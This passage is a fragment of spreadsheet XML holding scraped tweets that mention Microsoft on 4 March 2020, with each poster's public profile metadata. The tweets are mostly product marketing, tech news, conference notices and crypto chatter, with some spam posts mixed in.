    <t>Get #scalable #storage without breaking the bank. Try an agile #platform to meet your needs. https://t.co/Y5OrBsHsmG #azure #microsoft #cloud https://t.co/mK0Xlapg8d</t>
  </si>
  <si>
    <t>{'id': 48864421, 'id_str': '48864421', 'name': 'SSISG', 'screen_name': 'SSISG', 'location': 'The Universe', 'description': 'SSISG operates as a Global Information Technology Services provider, that focuses on providing Enterprise solutions, SaaS, and Infrastructure.', 'url': 'https://t.co/Rrou3ckD9F', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rrou3ckD9F', 'expanded_url': 'https://www.ssisg.com', 'display_url': 'ssisg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 596, 'friends_count': 835, 'listed_count': 82, 'created_at': 'Fri Jun 19 23:28:26 +0000 2009', 'favourites_count': 666, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4981,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'http://pbs.twimg.com/profile_images/2964905509/fc4f486baa05d9853f348f2b93f3d565_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2964905509/fc4f486baa05d9853f348f2b93f3d565_normal.png',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</si>
  <si>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15:34:56 +0000 2020</t>
  </si>
  <si>
    <t>Only 5 seats left before the waiting list kicks in for #sqlsatdenmark #sqlsat963
Read more and register here: https://t.co/9CoYzJl4zk
#conference #denmark #copenhagen #lyngby #techconf #microsoft #dataplatform
/cc @msdev_dk</t>
  </si>
  <si>
    <t>{'id': 130768739, 'id_str': '130768739', 'name': 'Jens Vestergaard', 'screen_name': 'vestergaardj', 'location': 'Copenhagen, Denmark', 'description': '#Microsoft #Data #Platform #MVP, @Microsoft #Certified #Trainer #MCT #sqlsatdenmark, #PowerBI, #IoT, @AzureDevOps, @TheWho and @Steelers He/Him', 'url': 'https://t.co/Oh7PiZiAGJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/Oh7PiZiAGJ', 'expanded_url': 'http://www.t-sql.dk', 'display_url': 't-sql.dk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1426, 'friends_count': 790, 'listed_count': 226, 'created_at': 'Thu Apr 08 07:29:37 +0000 2010', 'favourites_count': 461, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26091, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '001E29', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/705039847489183748/5MJfd7si_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/705039847489183748/5MJfd7si_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/130768739/1356093621',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</si>
  <si>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15:33:42 +0000 2020</t>
  </si>
  <si>
    <t>@ZenaKebede of @Microsoft speaking about internet inclusion and the Microsoft Airband Initiative at the #CanWISP Conference in Ottawa this morning.
Microsoft Airband Initiative is bridging the digital gap and bringing the world closer together.
#sonar #microsoft #bettertogether https://t.co/SDYdX4PEsm</t>
  </si>
  <si>
    <t>{'id': 3366822075, 'id_str': '3366822075', 'name': 'Sonar', 'screen_name': 'sonarsoftware', 'location': '', 'description': 'The future of ISP billing and OSS', 'url': 'https://t.co/o2SjFw0KJ9', 'entities': {'url': {'urls': [{'url': 'https://t.co/o2SjFw0KJ9', 'expanded_url': 'https://sonar.software', 'display_url': 'sonar.software', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 199, 'friends_count': 101, 'listed_count': 1, 'created_at': 'Thu Jul 09 01:00:21 +0000 2015', 'favourites_count': 319, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 263, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3BAFDA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161369459371773953/IrUGg3cW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161369459371773953/IrUGg3cW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3366822075/1565727031', 'profile_link_color': '3BAFDA',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</si>
  <si>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15:33:32 +0000 2020</t>
  </si>
  <si>
    <t>Which of these productivity tools do you use in your institution?
Your suite is not represented here? Share with us 
#productivity #microsoft #google #office365 #tools</t>
  </si>
  <si>
    <t>{'id': 834453172307501056, 'id_str': '834453172307501056', 'name': 'Taskwit', 'screen_name': 'asktaskwit', 'location': 'Ghana &amp; Nigeria', 'description': 'A task oriented and tailor made recruiting agency for companies looking for great additions to their teams to increase productivity and over all profit', 'url': 'https://t.co/6nYl80jLcy', 'entities': {'url': {'urls': [{'url': 'https://t.co/6nYl80jLcy', 'expanded_url': 'https://www.taskwit.net', 'display_url': 'taskwit.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 139, 'friends_count': 696, 'listed_count': 4, 'created_at': 'Wed Feb 22 17:21:54 +0000 2017', 'favourites_count': 313, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 636, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196060500871852033/Pj7viHnH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196060500871852033/Pj7viHnH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/834453172307501056/1573998609',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</si>
  <si>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15:32:43 +0000 2020</t>
  </si>
  <si>
    <t>hey #microsoft @microsoft -  why there is so many waste on your desk? one time plastic cups, one time paper cups. i can understand a can with a soda drink, but water? why not own ceramic cups? put a logo on them, advertise yourself the better way https://t.co/oOvvK1lBo7</t>
  </si>
  <si>
    <t>{'id': 204433762, 'id_str': '204433762', 'name': 'Polip Niesamowity', 'screen_name': 'polip123', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 18, 'listed_count': 1, 'created_at': 'Mon Oct 18 17:47:00 +0000 2010', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 548,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'http://pbs.twimg.com/profile_images/537307973496745984/3hlg5PXL_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/537307973496745984/3hlg5PXL_normal.png',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</si>
  <si>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15:32:42 +0000 2020</t>
  </si>
  <si>
    <t>Don't miss our February 2020 newsletter to get informed about our latest activities, initiatives, events and our members' news!
https://t.co/0KbN6Ul92F
#GSIC #Microsoft #sports #newsletter #innovation #technology #startups #events #sportsentities #DigitalTransformation https://t.co/EMowlFypIY</t>
  </si>
  <si>
    <t>Wed Mar 04 15:32:01 +0000 2020</t>
  </si>
  <si>
    <t>Gain insight into the #DellEMC hyper-converged portfolio, including #VxRail and XC Series appliances, VxRack System Flex plus #vSAN, VxFlex and #Microsoft Storage Spaces Direct Ready Nodes.
https://t.co/OcyerA0tOk</t>
  </si>
  <si>
    <t>{'id': 68781186, 'id_str': '68781186', 'name': 'TechTarget Storage', 'screen_name': 'SearchStorageTT', 'location': 'Newton, MA', 'description': "TechTarget's resource for data storage professionals. Follow us for the latest storage news, tech tips and expert advice.", 'url': 'https://t.co/K0gOoFtsNt', 'entities': {'url': {'urls': [{'url': 'https://t.co/K0gOoFtsNt', 'expanded_url': 'https://searchstorage.techtarget.com/', 'display_url': 'searchstorage.techtarget.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5665, 'friends_count': 801, 'listed_count': 252, 'created_at': 'Tue Aug 25 19:22:26 +0000 2009', 'favourites_count': 1613, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10408,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'http://pbs.twimg.com/profile_images/941378608450490373/4b-YuNR5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941378608450490373/4b-YuNR5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/68781186/1513277155', 'profile_link_color': '00B3AD',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</si>
  <si>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Mar 04 15:31:48 +0000 2020</t>
  </si>
  <si>
    <t>After a long time, got some time to write something interesting.
Search Contents of a #PDF File in #SharePoint Online, Make them Searchable Using #Microsoft #Flow #SharePointOnline
https://t.co/uGNG39uAL0</t>
  </si>
  <si>
    <t>Wed Mar 04 15:31:02 +0000 2020</t>
  </si>
  <si>
    <t>The NFL has announced a multi-year extension and expansion of its partnership with Microsoft, which will see all 32 franchises use the Microsoft Teams platform with the aim to enhance workflows  #NFL #Microsoft #SportsBiz 
https://t.co/IYksL1vZnY</t>
  </si>
  <si>
    <t>{'id': 28330466, 'id_str': '28330466', 'name': 'SportsPro', 'screen_name': 'SportsPro', 'location': 'London', 'description': 'Covering the global sports industry across print, digital and events  @_MichaelLong / @tbassam / @eoinfconnolly / @Sam__Carp / @StevenSportsPro / @EDixonSports', 'url': 'https://t.co/uVC9QCOCpr', 'entities': {'url': {'urls': [{'url': 'https://t.co/uVC9QCOCpr', 'expanded_url': 'http://www.sportspromedia.com', 'display_url': 'sportspromedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28214, 'friends_count': 172, 'listed_count': 769, 'created_at': 'Thu Apr 02 12:46:49 +0000 2009', 'favourites_count': 362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33848,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'http://pbs.twimg.com/profile_images/767696723863040000/3YQoz061_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/767696723863040000/3YQoz061_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28330466/1536054744', 'profile_link_color': 'DAA520', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DBABD8', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:30:22 +0000 2020</t>
  </si>
  <si>
    <t>On Demand Migration How to increase performance of an ODM Discover Task https://t.co/qexCT1cNGL #Microsoft #Office365 #Exchange #email #Mailbox #WednesdayWisdom https://t.co/iuRH9mzhwh</t>
  </si>
  <si>
    <t>Wed Mar 04 15:30:07 +0000 2020</t>
  </si>
  <si>
    <t>Want direct access to a team of responsive, 100% US-based #Microsoft experts?  Schedule a Free Consultation today: https://t.co/jYz0ycXTNz
Sign an annual Microsoft Support Services contract in March and save up to $5,000!
#sharepoint #powerapps #sqlserver #azure #office365 https://t.co/KugrAstIdE</t>
  </si>
  <si>
    <t>Wed Mar 04 15:29:03 +0000 2020</t>
  </si>
  <si>
    <t>License enforcement for users with new #Microsoft #Dynamics 365 Team Member licenses: https://t.co/Q5MrVU1IDz</t>
  </si>
  <si>
    <t>{'id': 51415840, 'id_str': '51415840', 'name': 'Jelle Kooi', 'screen_name': 'jellekooi', 'location': 'Apeldoorn, the Netherlands', 'description': 'Microsoft Licensing Endorsed Trainer', 'url': 'https://t.co/8HjbwdBZ6V', 'entities': {'url': {'urls': [{'url': 'https://t.co/8HjbwdBZ6V', 'expanded_url': 'http://www.didactive.com', 'display_url': 'didactive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1435, 'friends_count': 9, 'listed_count': 19, 'created_at': 'Sat Jun 27 11:37:26 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 350,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'http://pbs.twimg.com/profile_images/874523271890432000/gu1P215H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/874523271890432000/gu1P215H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/51415840/1496302808',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</si>
  <si>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15:28:39 +0000 2020</t>
  </si>
  <si>
    <t>I love to caress the tongue dick 
 #microsoft #sethrich https://t.co/hUtcLtdTC4</t>
  </si>
  <si>
    <t>{'id': 1235211813878468611, 'id_str': '1235211813878468611', 'name': 'Pamela Phillips', 'screen_name': 'PamelaP14881634', 'location': 'Manchester, USA', 'description': 'Heâ€™s more myself than I am. Whatever our souls are made of, his and mine are the same', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 49, 'listed_count': 0, 'created_at': 'Wed Mar 04 14:33:45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'http://pbs.twimg.com/profile_images/1235223860095660036/6APJ86EY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235223860095660036/6APJ86EY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235211813878468611/1583335321',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</si>
  <si>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15:28:01 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/XxszD5PkBA #Microsoft, EY and #ConsenSys Tout New Way for Big Biz to Use Public #Ethereum https://t.co/1sAxq5vx28 SEARCH FOR TRUTH</t>
  </si>
  <si>
    <t>{'id': 50550456, 'id_str': '50550456', 'name': 'Todd Huff * Digital Assets', 'screen_name': 'toddhuff123', 'location': 'Wyoming - USA', 'description': 'â€  Follower of Jesus Christ â€  https://t.co/loRfZZgygp | #Blockchain | #XRP | #Entrepreneur | #Digital | #BTC | #Asset | #Currency | #BitCoin | #Crypto | #ETH |', 'url': 'https://t.co/d4lDHI0r3k', 'entities': {'url': {'urls': [{'url': 'https://t.co/d4lDHI0r3k', 'expanded_url': 'https://www.binance.us/?ref=35068279', 'display_url': 'binance.us/?ref=35068279', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/loRfZZgygp', 'expanded_url': 'http://about.me/toddhuff', 'display_url': 'about.me/toddhuff', 'indices': [29, 52]}]}}, 'protected': False, 'followers_count': 13346, 'friends_count': 9404, 'listed_count': 35, 'created_at': 'Thu Jun 25 04:31:57 +0000 2009', 'favourites_count': 87, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 75334,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'http://pbs.twimg.com/profile_images/847327480444669952/lJqgrsIS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/847327480444669952/lJqgrsIS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50550456/1499864952',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</si>
  <si>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15:27:23 +0000 2020</t>
  </si>
  <si>
    <t>Faster and more reliable Exchange Online Management using PowerShell V2 Cmdlets https://t.co/LkyjZ2IZz7 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 15:27:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will soon enable Scheduled meetings and Meeting recordings for free edition of Teams https://t.co/1UinkHJn7X #lin</t>
  </si>
  <si>
    <t>{'id': 14687167, 'id_str': '14687167', 'name': 'Ed Glogowski', 'screen_name': 'edyg023', 'location': '44.882773,-93.402492', 'description': 'Software Development Manager, TPM, TPO Microsoft Evangelist Wanna-Be, ADHD, Passionate about Tech, Biblical Theology, OOB Thinker.', 'url': 'https://t.co/Yq5wmQ8eYI', 'entities': {'url': {'urls': [{'url': 'https://t.co/Yq5wmQ8eYI', 'expanded_url': 'http://edglogowski.com/', 'display_url': 'edglogowski.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 556, 'friends_count': 665, 'listed_count': 260, 'created_at': 'Wed May 07 14:42:33 +0000 2008', 'favourites_count': 370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 37921, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2D0F07', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1012370759547682816/5sz0Uour_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1012370759547682816/5sz0Uour_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14687167/1530202938', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': '2D0F07', 'profile_sidebar_fill_color': '180703', 'profile_text_color': '7D3B1D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 15:27:01 +0000 2020</t>
  </si>
  <si>
    <t>Imagine you can NOT say anything BAD about @POTUS Trump
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/NaFFmRx2rM</t>
  </si>
  <si>
    <t>Wed Mar 04 15:25:23 +0000 2020</t>
  </si>
  <si>
    <t>@UnibrightIO @baselineproto Good job guys! $UBT $LINK #EEA #Microsoft</t>
  </si>
  <si>
    <t>{'id': 263627857, 'id_str': '263627857', 'name': 'Roberto Premoli', 'screen_name': 'robypre', 'location': 'Bergamo', 'description': 'mi interesso in tecnologia, marketing, SEO, social media, giornalismo, stampa, web e mobile. And music is my life!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 281, 'friends_count': 987, 'listed_count': 4, 'created_at': 'Thu Mar 10 12:21:01 +0000 2011', 'favourites_count': 6161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 439,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'http://pbs.twimg.com/profile_images/508532933876264960/V3PBd-Qq_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/508532933876264960/V3PBd-Qq_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/263627857/1404258467', 'profile_link_color': 'E81C4F',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</si>
  <si>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15:25:10 +0000 2020</t>
  </si>
  <si>
    <t>BrandPost: CISO Imperatives in the Age of Digital Transformation https://t.co/Zt1UYPML1d via @HYBRID_CIRCLE #Microsoft #Cisco https://t.co/5wYRjNf83e</t>
  </si>
  <si>
    <t>Wed Mar 04 15:24:29 +0000 2020</t>
  </si>
  <si>
    <t>Alright tweeps, anyone have some #microsoft laptop #stickers to share? My laptop is still half naked, could use some 1337 swag here. Thanks! #community</t>
  </si>
  <si>
    <t>{'id': 387037217, 'id_str': '387037217', 'name': 'Dennis Rietveld', 'screen_name': 'R33Dfield', 'location': 'Netherlands', 'description': 'Freelance IT dude since Y2K \\ messing around with Microsoft stuff \\ 1337 \\ also interested in retro gaming \\ Getting the job done', 'url': 'https://t.co/Wz3BIB3slh', 'entities': {'url': {'urls': [{'url': 'https://t.co/Wz3BIB3slh', 'expanded_url': 'https://rietveld-ict.nl/blog', 'display_url': 'rietveld-ict.nl/blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 577, 'listed_count': 25, 'created_at': 'Sat Oct 08 10:48:55 +0000 2011', 'favourites_count': 380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 930,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'http://pbs.twimg.com/profile_images/809490057249849344/NFx5322Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/809490057249849344/NFx5322Y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/387037217/1582730403',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</si>
  <si>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15:23:43 +0000 2020</t>
  </si>
  <si>
    <t>You Lied once and ALL your Truths become questionable.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/JVKSU7JFDi</t>
  </si>
  <si>
    <t>Wed Mar 04 15:23:31 +0000 2020</t>
  </si>
  <si>
    <t>@UnibrightIO @baselineproto AMAZING  $UBT will sky rocket with this.  Great work #EEA. 
"The Baseline Protocol uses the Ethereum Mainnet as a common frame of reference: always on, unrestricted, pay-per-use." 
$UBT token is mentioned there. Lets go!  #MagicBus #Microsoft #baseline #DeFi #chainlink #ether2</t>
  </si>
  <si>
    <t>{'id': 235028877, 'id_str': '235028877', 'name': 'Gucci Capper', 'screen_name': 'GucciCapper', 'location': '', 'description': "Chat 24/7 on GucciCapper's official telegram.  Pregame, halftime and in-game plays are all posted there.", 'url': 'https://t.co/BNZ7HoDffK', 'entities': {'url': {'urls': [{'url': 'https://t.co/BNZ7HoDffK', 'expanded_url': 'https://t.me/GucciCapperSportsHandicapping', 'display_url': 't.me/GucciCapperSpoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 378, 'friends_count': 6, 'listed_count': 3, 'created_at': 'Fri Jan 07 04:59:32 +0000 2011', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 322,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'http://pbs.twimg.com/profile_images/1209378437/gucci-logo_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209378437/gucci-logo_normal.gif',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</si>
  <si>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15:22:55 +0000 2020</t>
  </si>
  <si>
    <t>Google and #Microsoft are giving away enterprise conferencing tools due to coronavirus https://t.co/LszCwtSlaR</t>
  </si>
  <si>
    <t>Wed Mar 04 15:22:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft confirms Live Tiles will not go away, but your Windows 10 Start Menu will look better without them https://t.co/nDB1UhFfn3</t>
  </si>
  <si>
    <t>Wed Mar 04 15:20:31 +0000 2020</t>
  </si>
  <si>
    <t>$link &amp;amp; #Microsoft</t>
  </si>
  <si>
    <t>{'id': 2481369209, 'id_str': '2481369209', 'name': 'Remco K', 'screen_name': 'k_remco1980', 'location': 'Texas, USA', 'description': 'Enjoying life ðŸ‘ðŸ‘ðŸ˜‰', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 242, 'friends_count': 142, 'listed_count': 1, 'created_at': 'Sun Apr 13 11:49:18 +0000 2014', 'favourites_count': 9860, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6742,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'http://pbs.twimg.com/profile_images/1229493547440726016/jVQQr3sV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229493547440726016/jVQQr3sV_normal.jpg',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</si>
  <si>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15:20:20 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> $LINK #Chainlink
#EY #MICROSOFT https://t.co/SrLNo5YKAq</t>
  </si>
  <si>
    <t>{'id': 1223889274107518976, 'id_str': '1223889274107518976', 'name': 'YOUJUSTWIN.LINK', 'screen_name': 'YOUJUSTWIN1', 'location': '', 'description': 'CRUIJFF IS BACK', 'url': 'https://t.co/PQCgaSJG5m', 'entities': {'url': {'urls': [{'url': 'https://t.co/PQCgaSJG5m', 'expanded_url': 'https://chain.link/', 'display_url': 'chain.link', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 458, 'friends_count': 250, 'listed_count': 2, 'created_at': 'Sun Feb 02 08:42:04 +0000 2020', 'favourites_count': 11918, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1353, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225046259867770881/bfAaGkwI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225046259867770881/bfAaGkwI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1223889274107518976/1580637772',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</si>
  <si>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15:20:02 +0000 2020</t>
  </si>
  <si>
    <t>What is MOST important?
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/MO0XC4N2BS</t>
  </si>
  <si>
    <t>Wed Mar 04 15:19:19 +0000 2020</t>
  </si>
  <si>
    <t>@jwolpert AMAZING  $UBT will sky rocket with this.  Great work #EEA. 
"The Baseline Protocol uses the Ethereum Mainnet as a common frame of reference: always on, unrestricted, pay-per-use." 
$UBT token is mentioned there. Lets go!  #MagicBus #Microsoft #baseline #DeFi #chainlink #ether2</t>
  </si>
  <si>
    <t>Wed Mar 04 15:18:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft expands partnership with the #NFL to include Microsoft Teams https://t.co/FloY5w4hMr #microsoftteams #lin</t>
  </si>
  <si>
    <t>Wed Mar 04 15:18:52 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, EY and ConsenSys Present New Way for Big Biz to Use Public Ethereum
#bitcoin #cryptocurrency  #crypto #CryptoNews #btc #bitcoinnews #blockchain #Ethereum #Microsoft https://t.co/uYNOOeg36O</t>
  </si>
  <si>
    <t>{'id': 1088026645481558017, 'id_str': '1088026645481558017', 'name': 'CryptoTweets Official', 'screen_name': 'CryptotweetsO', 'location': '', 'description': 'Latest CryptoCurrency and Blockchain news', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 812, 'friends_count': 372, 'listed_count': 3, 'created_at': 'Wed Jan 23 10:52:21 +0000 2019', 'favourites_count': 2080, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1646, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1105428079260909568/lFwzijib_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105428079260909568/lFwzijib_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1088026645481558017/1552389565',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</si>
  <si>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15:17:39 +0000 2020</t>
  </si>
  <si>
    <t>I went to the shower in the morning, but I still couldn't wash my dirty thoughts. I want your bolt to go into my nut!
https://t.co/GNj7Wj9zph
#Allen
 #wedding #microsoft https://t.co/Y1OrRM3j2v</t>
  </si>
  <si>
    <t>{'id': 1234536930932658179, 'id_str': '1234536930932658179', 'name': 'Tanya Harper', 'screen_name': 'wilbpsychbeargu', 'location': 'Provo, USA', 'description': 'Promise me youâ€™ll always remember: Youâ€™re braver than you believe, and stronger than you seem, and smarter than you think.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Mon Mar 02 17:52:08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'http://pbs.twimg.com/profile_images/1234544314837078016/38HVCaB__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234544314837078016/38HVCaB__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234536930932658179/1583173311',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</si>
  <si>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15:17:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Teams for Android updated with live captions support and more https://t.co/7RNl6Apbf4 #microsoftteams #lin</t>
  </si>
  <si>
    <t>Wed Mar 04 15:16:34 +0000 2020</t>
  </si>
  <si>
    <t>It's slowing down, IF and ONLY IF you can believe China.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/QXiHLdltCS</t>
  </si>
  <si>
    <t>Wed Mar 04 15:15:48 +0000 2020</t>
  </si>
  <si>
    <t>With #SherWeb, VOX ISM delivers all the productivity, security, backup &amp;amp; training tools you need to optimize #Microsoft #Office365 in one smart bundle. https://t.co/JdBoXsefvw</t>
  </si>
  <si>
    <t>Wed Mar 04 15:14:34 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/5VBMeERIiw</t>
  </si>
  <si>
    <t>Wed Mar 04 15:14:28 +0000 2020</t>
  </si>
  <si>
    <t>Teams today must be able to accommodate swift and frequent change. Need a technology solution that helps your team collaborate more quickly and effectively? Contact Solutions For Success LLC today to put #Microsoft #Teams to work for your company. https://t.co/LYemzNSEpo</t>
  </si>
  <si>
